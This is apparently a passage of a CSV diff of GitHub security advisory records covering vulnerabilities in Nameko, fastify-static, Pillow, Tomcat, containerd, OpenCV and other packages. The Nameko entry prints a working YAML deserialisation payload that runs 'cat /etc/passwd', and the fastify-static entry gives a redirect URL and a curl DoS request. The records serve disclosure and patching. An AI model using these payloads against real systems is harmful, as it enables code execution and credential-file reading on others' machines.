{'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14493'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15127'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T14:48:09Z', 'nvd_published_at': '2019-08-01T17:15:00Z'}"
+1.4.0,GHSA-284f-f2hw-j2gx,2021-10-18T18:15:50Z,2021-10-12T18:41:59Z,,['CVE-2021-22958'],Server-Side Request Forgery vulnerability in concrete5,A Server-Side Request Forgery vulnerability was found in concrete5 < 8.5.5 that allowed a decimal notation encoded IP address to bypass the limitations in place for localhost allowing interaction with local services. Impact can vary depending on services exposed.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22958'}, {'type': 'WEB', 'url': 'https://github.com/concrete5/concrete5/pull/8826'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/863221'}, {'type': 'WEB', 'url': 'https://documentation.concretecms.org/developers/introduction/version-history/855-release-notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/concrete5/concrete5'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:44:32Z', 'nvd_published_at': '2021-10-07T14:15:00Z'}"
+1.4.0,GHSA-6p52-jr3q-c94g,2023-09-01T21:39:22Z,2021-10-19T15:28:57Z,,['CVE-2021-41078'],Nameko Arbitrary code execution due to YAML deserialization,"### Impact
+
+Nameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example:
+
+``` yaml
+# malicious.yaml
+!!python/object/new:type
+args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
+listitems: ""__import__('os').system('cat /etc/passwd')""
+```
+
+``` shell
+$ nameko run --config malicious.yaml test
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+...
+```
+
+### Patches
+
+The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release.
+
+Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.
+
+### Workarounds
+
+The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'nameko'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.14.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'nameko'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0rc0'}, {'fixed': '3.0.0rc10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.0.0rc9'}}]","[{'type': 'WEB', 'url': 'https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41078'}, {'type': 'PACKAGE', 'url': 'https://github.com/nameko/nameko'}, {'type': 'WEB', 'url': 'https://github.com/nameko/nameko/releases/tag/v2.14.0'}, {'type': 'WEB', 'url': 'https://github.com/nameko/nameko/releases/tag/v3.0.0-rc10'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T15:14:24Z', 'nvd_published_at': '2021-10-26T13:15:00Z'}"
+1.4.0,GHSA-pgh6-m65r-2rhq,2021-10-21T14:57:14Z,2021-10-12T16:04:17Z,,['CVE-2021-22964'],DOS and Open Redirect with user input,"### Impact
+
+A redirect vulnerability in the `fastify-static` module allows remote attackers to redirect Mozilla Firefox users to arbitrary websites via a double slash `//` followed by a domain: `http://localhost:3000//a//youtube.com/%2e%2e%2f%2e%2e`.
+
+A DOS vulnerability is possible if the URL contains invalid characters `curl --path-as-is ""http://localhost:3000//^/..""`
+
+The issue shows up on all the `fastify-static` applications that set `redirect: true` option. By default, it is `false`.
+
+### Patches
+The issue has been patched in `fastify-static@4.4.1`
+
+### Workarounds
+If updating is not an option, you can sanitize the input URLs using the [`rewriteUrl`](https://www.fastify.io/docs/latest/Server/#rewriteurl) server option.
+
+### References
+
++ Bug founder: drstrnegth
++ [hackerone Report](https://hackerone.com/reports/1361804)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [fastify-static](https://github.com/fastify/fastify-static)
+* Contact the [security team](https://github.com/fastify/fastify/blob/main/SECURITY.md#the-fastify-security-team)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-static'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.4'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-static/security/advisories/GHSA-pgh6-m65r-2rhq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22964'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-static/commit/c31f17d107cb19a0e96733c80a9abf16c56166d4'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1361804'}, {'type': 'PACKAGE', 'url': 'https://github.com/fastify/fastify-static'}]","{'cwe_ids': ['CWE-248', 'CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T18:38:24Z', 'nvd_published_at': '2021-10-14T15:15:00Z'}"
+1.4.0,GHSA-m6m5-pp4g-fcc8,2021-10-06T16:48:49Z,2021-10-06T17:47:35Z,,[],S3 storage write is not aborted on errors leading to unbounded memory usage,"### Impact
+
+Anyone using storage.blob.s3 introduced in 0.5.0 with storage.imapsql.
+```
+storage.imapsql local_mailboxes {
+ ...
+ msg_store s3 {
+ ...
+ }
+}
+```
+
+### Patches
+
+The relevant commit is pushed to master and will be included in the 0.5.1 release.
+
+No special handling of the issue has been done due to the small amount of affected users.
+
+### Workarounds
+
+None.
+
+### References
+
+* Original report: https://github.com/foxcpp/maddy/issues/395
+* Fix: https://github.com/foxcpp/maddy/commit/07c8495ee4394fabbf5aac4df8aebeafb2fb29d8","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/foxcpp/maddy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/foxcpp/maddy/security/advisories/GHSA-m6m5-pp4g-fcc8'}, {'type': 'PACKAGE', 'url': 'https://github.com/foxcpp/maddy'}]","{'cwe_ids': ['CWE-772'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:48:49Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pvv8-8fx9-h673,2021-10-25T20:07:48Z,2021-10-19T15:28:03Z,,['CVE-2021-41151'],Path Traversal in @backstage/plugin-scaffolder-backend ,"### Impact
+
+A malicious actor could read sensitive files from the environment where Scaffolder tasks are run. The attack is executed by crafting a custom Scaffolder template with a `publish:github:pull-request` action using a particular source path. When the template is executed the sensitive files would be included in the published pull request.
+
+This vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request.
+
+### Patches
+
+The vulnerability is patched in the `0.15.9` release of `@backstage/plugin-scaffolder-backend`.
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue in the [Backstage repository](https://github.com/backstage/backstage)
+* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-scaffolder-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.4'}, {'fixed': '0.15.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41151'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/6968962c920508eae19a4c1c200fa2c8980a4006'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/releases/tag/release-2021-10-16'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-18T20:47:02Z', 'nvd_published_at': '2021-10-18T21:15:00Z'}"
+1.4.0,GHSA-m6j4-8r7p-wpp3,2021-10-06T16:57:01Z,2021-10-06T17:46:55Z,,['CVE-2021-21389'],BuddyPress privilege escalation via REST API,"### Impact
+It's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the BuddyPress REST API members endpoint.
+
+### Patches
+The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.
+
+### References
+https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [HackerOne](https://hackerone.com/wordpress)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'buddypress/buddypress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '7.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21389'}, {'type': 'WEB', 'url': 'https://buddypress.org/2021/03/buddypress-7-2-1-security-release/'}, {'type': 'WEB', 'url': 'https://codex.buddypress.org/releases/version-7-2-1/'}, {'type': 'PACKAGE', 'url': 'https://github.com/buddypress/BuddyPress'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T16:57:01Z', 'nvd_published_at': '2021-03-26T21:15:00Z'}"
+1.4.0,GHSA-c2h3-6mxw-7mvq,2021-10-15T17:31:03Z,2021-10-04T20:14:47Z,,['CVE-2021-41103'],Insufficiently restricted permissions on plugin directories,"### Impact
+A bug was found in containerd where container root directories and some plugins had insufficiently restricted permissions, allowing otherwise unprivileged Linux users to traverse directory contents and execute programs. When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. When the UID of an unprivileged Linux user on the host collided with the file owner or group inside a container, the unprivileged Linux user on the host could discover, read, and modify those files.
+
+### Patches
+This vulnerability has been fixed in containerd 1.4.11 and containerd 1.5.7. Users should update to these version when they are released and may restart containers or update directory permissions to mitigate the vulnerability.
+
+### Workarounds
+Limit access to the host to trusted users. Update directory permission on container bundles directories.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [github.com/containerd/containerd](https://github.com/containerd/containerd/issues/new/choose)
+* Email us at [security@containerd.io](mailto:security@containerd.io)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/containerd/containerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/containerd/containerd/security/advisories/GHSA-c2h3-6mxw-7mvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41103'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/commit/5b46e404f6b9f661a205e28d59c982d3634148f8'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-222547.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/containerd/containerd'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.4.11'}, {'type': 'WEB', 'url': 'https://github.com/containerd/containerd/releases/tag/v1.5.7'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B5Q6G6I4W5COQE25QMC7FJY3I3PAYFBB/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNFADTCHHYWVM6W4NJ6CB4FNFM2VMBIB/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5002'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T17:05:03Z', 'nvd_published_at': '2021-10-04T17:15:00Z'}"
+1.4.0,GHSA-4286-h47h-m5v6,2023-09-21T22:49:27Z,2021-10-25T19:43:24Z,,['CVE-2021-41745'],Showdoc File Upload Vulnerability,"A file upload vulnerability exists in Showdoc 2.8.3, which can be exploited by an attacker to gain server privileges.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41745'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/aec3df841958059c1db9ab1af25acc2af81e4e0e'}, {'type': 'WEB', 'url': 'https://github.com/purple-WL/SHOWDOC-file-upload-vulnerability'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://www.cnvd.org.cn/flaw/show/CNVD-2020-49480'}]","{'cwe_ids': ['CWE-287', 'CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:46:11Z', 'nvd_published_at': '2021-10-22T12:15:00Z'}"
+1.4.0,GHSA-7534-mm45-c74v,2021-10-05T18:52:50Z,2021-10-05T20:24:41Z,,['CVE-2021-34552'],Buffer Overflow in Pillow,Pillow through 8.2.0 and PIL (aka Python Imaging Library) through 1.1.7 allow an attacker to pass controlled parameters directly into a convert function to trigger a buffer overflow in Convert.c.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pillow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34552'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5567'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/31c473898c29d1b7cb6555ce67d9503a4906b83f'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V6LCG525ARIX6LX5QRYNAWVDD2MD2SV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VUGBBT63VL7G4JNOEIPDJIOC34ZFBKNJ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.3.0.html#buffer-overflow'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/index.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202211-10'}]","{'cwe_ids': ['CWE-120'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:52:50Z', 'nvd_published_at': '2021-07-13T17:15:00Z'}"
+1.4.0,GHSA-wph7-x527-w3h5,2022-02-08T20:42:53Z,2021-10-15T18:51:34Z,,['CVE-2021-42340'],Missing Release of Resource after Effective Lifetime in Apache Tomcat,"The fix for bug 63362 present in Apache Tomcat 10.1.0-M1 to 10.1.0-M5, 10.0.0-M1 to 10.0.11, 9.0.40 to 9.0.53 and 8.5.60 to 8.5.71 introduced a memory leak. The object introduced to collect metrics for HTTP upgrade connections was not released for WebSocket connections once the connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.0-M6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.1.0-M5'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0-M1'}, {'fixed': '10.0.12'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.40'}, {'fixed': '9.0.54'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.60'}, {'fixed': '8.5.72'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42340'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10379'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8097a2d1550aa78e585fc77e602b9046e6d4099d8d132497c5387784@%3Ccommits.myfaces.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r83a35be60f06aca2065f188ee542b9099695d57ced2e70e0885f905c%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-34'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20211104-0001/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5009'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}]","{'cwe_ids': ['CWE-772'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-15T13:59:01Z', 'nvd_published_at': '2021-10-14T20:15:00Z'}"
+1.4.0,GHSA-g92x-8m54-p89v,2021-10-22T13:56:56Z,2021-10-21T17:48:55Z,,['CVE-2021-3858'],Cross-Site Request Forgery in snipe-it,snipe-it is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'snipe/snipe-it'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3858'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/commit/84c73aae5dcafa9529ceeeda6e8cdda5a42129c3'}, {'type': 'PACKAGE', 'url': 'https://github.com/snipe/snipe-it'}, {'type': 'WEB', 'url': 'https://github.com/snipe/snipe-it/releases/tag/v5.3.0'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a2fac2eb-100d-45b1-9ac7-71847c2f2b6b'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:45:53Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}"
+1.4.0,GHSA-q799-q27x-vp7w,2021-10-06T17:39:57Z,2021-10-12T22:23:21Z,,['CVE-2019-5064'],Out-of-bounds Write in OpenCV,"An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV, version 4.1.0 (corresponds with OpenCV-Python version 4.1.2.30). A specially crafted JSON file can cause a buffer overflow, resulting in multiple heap corruptions and potentially code execution. An attacker can provide a specially crafted file to trigger this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.0.32'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.2.30'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5064'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15857'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/32'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/releases/tag/4.2.0'}, {'type': 'WEB', 'url': 'https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:39:57Z', 'nvd_published_at': '2020-01-03T17:15:00Z'}"
+1.4.0,GHSA-g67g-hvc3-xmvf,2021-10-14T18:50:58Z,2021-10-14T21:19:23Z,,['CVE-2021-41132'],Inconsistent input sanitisation leads to XSS vectors,"### Background
+
+A variety of templates do not perform proper sanitization through HTML escaping.
+Due to the lack of sanitization and use of ``jQuery.html()``, there are a whole host of XSS possibilities with specially crafted input to a variety of fields.
+
+### Impact
+
+OMERO.web before 5.11.0 and OMERO.figure before 4.4.1.
+
+### Patches
+Users should upgrade OMERO.web to 5.11.0 or higher and OMERO.figure to 4.4.1 or higher.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'omero-web'}, 'ecosystem_specific': {'affected_functions': ['omeroweb.webclient.views.load_metadata_preview']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.11.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'omero-figure'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ome/omero-web/security/advisories/GHSA-g67g-hvc3-xmvf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41132'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/commit/0168067accde5e635341b3c714b1d53ae92ba424'}, {'type': 'PACKAGE', 'url': 'https://github.com/ome/omero-web'}, {'type': 'WEB', 'url': 'https://www.openmicroscopy.org/security/advisories/2021-SV3/'}]","{'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-14T18:50:58Z', 'nvd_published_at': '2021-10-14T16:15:00Z'}"
+1.4.0,GHSA-qcgx-crrx-38v5,2021-10-20T19:22:21Z,2021-10-13T18:54:09Z,,['CVE-2021-33609'],Denial of service in DataCommunicator class in Vaadin 8,Missing check in `DataCommunicator` class in `com.vaadin:vaadin-server` versions 8.0.0 through 8.14.0 (Vaadin 8.0.0 through 8.14.0) allows authenticated network attacker to cause heap exhaustion by requesting too many rows of data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.14.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-qcgx-crrx-38v5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33609'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12415'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/framework'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33609'}]","{'cwe_ids': ['CWE-20', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:39:24Z', 'nvd_published_at': '2021-10-13T11:15:00Z'}"
+1.4.0,GHSA-q324-q795-2q5p,2021-10-11T18:40:44Z,2021-10-12T16:05:11Z,,[],Path traversal when using `preview-docs` when working dir contains files with question mark `?` in name,"### Impact
+`preview-docs` command allows path traversal if current working dir contains files with question mark `?` in name and attacker knows the name.
+
+### Patches
+It was patched starting from 1.0.0-beta.59
+
+### Workarounds
+Do not run openapi-cli preview-docs command in the folder which contains files with question mark `?` in name.
+
+### References
+https://github.com/Redocly/openapi-cli/pull/347
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [@redocly/openapi-cli](https://github.com/Redocly/openapi-cli)
+* Email us at [security@redocly.com](mailto:security@redocly.com)
+",[],"[{'package': {'ecosystem': 'npm', 'name': '@redocly/openapi-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-beta.59'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-beta.58'}}]","[{'type': 'WEB', 'url': 'https://github.com/Redocly/openapi-cli/security/advisories/GHSA-q324-q795-2q5p'}, {'type': 'WEB', 'url': 'https://github.com/Redocly/openapi-cli/pull/347'}, {'type': 'PACKAGE', 'url': 'https://github.com/Redocly/openapi-cli'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T18:40:44Z', 'nvd_published_at': None}"
